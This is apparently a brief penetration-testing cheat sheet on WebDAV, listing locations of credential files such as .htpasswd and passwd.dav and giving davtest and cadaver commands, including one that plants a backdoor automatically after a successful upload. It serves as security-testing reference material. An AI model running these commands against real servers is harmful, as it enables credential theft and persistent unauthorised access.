webdav

Cred File

# names
.htpasswd
passwd.dav

# check in
/etc/apache2
/var/www
/var/www/html
/var/www/html/*/webdav

davtest (auto-scan)

davtest -url http://IP/PATH -cleanup [-auth user:pass] [-nocreate]
# cleanup: clean post testing
# nocreate: does not create directory to test in webdav root dir

# auto backdoor on successful upload
$ davtest -url http://IP/PATH [-auth user:pass] -sendbd auto

# upload file
davtest -url http://IP/PATH [auth user:pass] -uploadfile <FILE> -uploadloc <FILENAME-ON-SERVER>

cadaver (manual enum)

cadaver http://IP/PATH
# will ask your user:pass

put <FILE>

References

Hacktricks.xyz/put-method-webdav

Previoustelnet Nextwordpress

Last updated 3 years ago